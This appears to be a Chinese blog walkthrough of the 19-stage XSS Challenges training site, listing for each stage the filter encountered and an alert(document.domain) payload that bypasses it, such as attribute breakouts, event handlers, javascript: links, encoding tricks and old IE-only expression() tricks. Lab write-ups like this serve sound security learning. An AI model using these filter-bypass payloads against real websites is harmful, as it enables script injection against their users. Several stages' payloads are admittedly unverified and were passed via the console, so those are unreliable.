XSS Challenges
一个xss练手的小平台 http://xss-quiz.int21h.jp/
一共19关,每一关根据提示执行js : alert(document.domian);
第一关
直接插入测试
<script>alert(document.domain)</script>
第二关
直接插入测试,并没有弹框,查看源码,我们需要闭合标签
<script>alert(document.domain)</script>
修改payload测试,成功弹窗
"><script>alert(document.domain)</script>
第三关
提示输入点不止一处,抓包,修改p2参数为
<script>alert(document.domain)</script>
成功弹窗
第四关
老样子,抓包,发现隐藏参数p3,修改为
"><script>alert(document.domain)</script>
成功弹窗
第五关
修改 maxlength 的值,使用 payload 成功弹窗
"><script>alert(document.domain)</script>
第六关
使用payload发现 < > 被HTML实体编码
"><script>alert(document.domain)</script>
使用 引号 “ 闭合 添加标签属性,点击触发弹窗
" onclick=alert(document.domain)
第七关
与第六关类似,并且也过滤了双引号 无法闭合逃脱双引号
使用空格可以分隔属性,和第六关payload一样
" onclick=alert(document.domain)
第八关
输入URL:
在a标签中构造javascript协议,点击触发
javascript:alert(document.domain);
第九关
这一关需要使用 IE浏览器 将payload构造为 UTF-7编码 网上说 ie7 或 ie8 - - 本地测试都没有复现
payload
+/v8 +ACI- onmouseover=alert(d+AG8AYw-u+AG0-en+AHQALg-d+AG8AbQBh-in)+AD4-
所以直接简单粗暴
第十关
使用payload,domain被替换为空
" onclick=alert(document.domain)
双写绕过:
" onclick=alert(document.dodomainmain)
第十一关
转义 script on... style
插入a标签绕过:payload中 script 中间插入 ,
,空格等不可见字符对script进行分割,让正则匹配不到
"><a href="javascr ipt:alert(document.domain);">12</a>
第十二关
过滤了尖括号、双引号、空格
利用IE浏览器特性 反引号 ` 解析为引号 构造payload
``onmouseover=alert(document.domain);
第十三关
同样,过滤了尖括号和双引号 再次利用IE浏览器,IE11无法执行,IE8测试通过
xss:expr/*XSS*/ession(alert(document.domain));
第十四关
和上一关类似, 把url,script,eval,expression关键字都替换为了xxx。通过注释符号 \0 绕过 ie8测试通过
xss:expr\0ession(alert(document.domain));
xss:expr/**/ession(alert(document.domain));
第十五关
js dom 环境 js 可解码 16、8等 进制 Unicode编码,环境转义了反斜杠 \ 双写绕过 构造payload
16进制编码 \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
Unicode编码 \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
第十六关
把\\x 替换成了\\\\x,js编码又不止16进制,还有八进制,unicode编码
使用Unicode编码绕过
Unicode编码 \\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
第十七关
思路类似于宽字节注入,利用特殊字节吃掉双引号 抓包
p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7
本地IE6 未测试成功 console暴力过关
第十八关
将每个字符的二进制最高位置为1,然后再转为16进制
"><script>alert(document.domain)</scirpt>
就转换为
%A2%BE%BCscript%BEalert(document.domain);%BC/script%BE
网上说IE5 6 可行,本地IE6测试未复现成功
第十九关
Twitter漏洞 在IE8 测试 未成功
#!javascript:alert(document.domain)
直接暴力 console,ok 成功模拟过关 ~
XSS Challenges相关推荐
- XSS Challenges闯关1-6
第一关: 靶场链接:XSS Challenges (by yamagata21) - Stage #1 第一关截图:(翻译为中文后) 选中Hint查看提示:显示非常容易,但是图中显示必须要用alert ...
- xss challenges闯关详细(6-10)
XSS Challenges (by yamagata21) - Stage #1 目录 一.第六关 二.第七关 三.第八关 四.第九关 五.第十关 一.第六关 输入good man测试 回显位置,输 ...
- XSS Challenges stage#1-10闯关详解
XSS Challenges stage1-10闯关详解 文章目录 XSS Challenges stage1-10闯关详解 0x01 xss challenges 闯关环境准备 1.XSS chal ...
- XSS学习笔记:XSS Challenges 1-19通关全详解
前言 学习下XSS 主要是XSS Challenges 平台 共19关 模仿真实xss挖洞的情景,用浏览器中的f12中搜索,找出我们控制的代码所在的位置 思考那些个位置哪个或哪几个位置可以被注入我们想 ...
- XSS入门 XSS Challenges靶场搭建/前五关/基础教程
前面写了很多XSS漏洞的利用,这一章开始重点在XSS漏洞的挖掘和如何注入script代码上,和sql注入相类似 目录 一.实验环境--XSS Challenges 二.探测XSS过程 第一关 第二关 ...
- 黑客之XSS注入练手:XSS Challenges通关指南
本文目录: [TOC] 一.XSS Challenges介绍 靶场地址:http://xss-quiz.int21h.jp/ 相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示 ...
- XSS练习平台【XSS Challenges】
以下来自XSS练习平台----XSS Challenges 这个练习平台没有像alert(1)to win类似的平台一样会给出关键的源代码,并且会在页面给予反馈.这是一个模仿真实xss挖洞的情景,在X ...
- XSS Challenges xss-quiz.int21h.jp
概述: https://xss-quiz.int21h.jp/ Stage #1 payload: <script>alert(document.domain);</script&g ...
- XSS challenges闯关笔记
文章目录 stage-1 没有过滤的XSS stage-2 标签属性中的XSS stage-3 选择列表中的XSS stage-4 隐藏提交参数中的XSS stage-5 限制输入长度的XSS sta ...
最新文章
- Jenkins实现SVN+Maven+Java项目的持续集成
- 大二菜鸟———无重复字符的最长子串
- c# for 应输入;
- Linux登录安全及用户操作审计 ,linux下清理日志脚本
- 解决问题 inner element must either be a resource reference or empty.
- linux下开启程序崩溃生成core文件开关之ulimit详解
- Python获取一个字符串所有连续子串
- Spark Core
- python仿真搭建_mock搭建——python——搭建一个简单的mock服务——简单版本
- Delphi的TdxDBGrid自带的一些有用的导出文件的函数(EXCEL、HTML、XML、TXT、INI、Registry等)
- 计算机应用基础文字处理测试题,国家开放大学《计算机应用基础》考试与答案形考任务模块2Word2010文字处理系统—客观题测验答案.docx...
- bzoj 1639: [Usaco2007 Mar]Monthly Expense 月度开支(二分)
- KnockoutJS(4)-控制文本和外观绑定
- Head First C 学习日志 第十章 进程间通信 输入输出重定向
- mac 发现 添加 连接 局域网内打印机
- opendrive map with UE4
- matlab最后ceq,求解 minimax 约束问题
- win10的计算机 桌面图标不见了怎么办,Win10我的电脑怎么放在桌面?Win10此电脑图标不见了的解决方法...
- 简单力场护盾效果ASE实现笔记
- Gluster文件系统